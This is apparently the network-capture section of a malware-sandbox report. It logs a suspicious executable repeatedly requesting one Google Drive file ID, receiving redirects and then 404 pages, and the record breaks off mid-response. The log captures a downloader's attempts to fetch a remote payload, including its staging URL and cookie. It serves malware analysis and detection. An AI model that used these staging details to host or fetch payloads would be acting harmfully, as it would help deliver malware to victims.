                                                                    2024-12-03 16:25:40 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 36 79 75 46 51 43 6d 77 58 74 53 68 74 37 4e 64 49 62 54 55 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="A6yuFQCmwXtSht7NdIbTUQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.549959172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:42 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:43 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:43 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-ikjzFsLpFC-OLb9dzqOi5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.549960142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:45 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:46 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:45 GMT
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-h6UIz2VSNNV4WndnJiCAmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC7rP1NHeXdQVUdi8CB0M2dXZ1NDnrOiy9uX11jSHRvd7us6dJzRfNVd376ScjnNpczzLvYLodsyIg
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:25:46 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 75 4c 47 50 65 79 69 38 79 52 64 6e 30 49 69 39 46 67 32 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GuLGPeyi8yRdn0Ii9Fg2Ig">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.549961172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:48 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:49 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:48 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: script-src 'nonce-j8rBOA2dPyAbpexFYNkwDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.549962142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:50 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:51 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:51 GMT
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-E3SL-r0hctxHGFX8VRfLEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC5GQWEqRgPNTFwzgx-9_mXkpGGwCjPNsEZAGTKOdiZ_SB30ExC_QLCu2cWBcizoe15JR8zRqYZ1oQ
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:25:51 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 55 44 6a 2d 61 74 5f 31 79 48 35 35 6f 79 76 47 51 71 4d 62 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZUDj-at_1yH55oyvGQqMbQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.549963172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:53 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:54 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:54 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-ZHtKzR_9gFrWrqTOPOp9Rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.549964142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:56 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:57 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:57 GMT
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-mEk3TmjwGJzJy7oiUWC7ng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC7lxyRjYr-0TlRhywSH3PcboZ8zH1cYvAF2MlskU-v3ri_e0Y6qaySvDn-pJoWK23yAQw_h85bB3w
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:25:57 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 54 59 4d 34 72 77 41 31 42 49 65 46 79 36 58 74 63 44 71 2d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TTYM4rwA1BIeFy6XtcDq-Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.549965172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:59 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:00 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:26:00 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-Jqd3egMuC7MOWuZlAdJj3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.549966142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:26:02 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:26:03 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
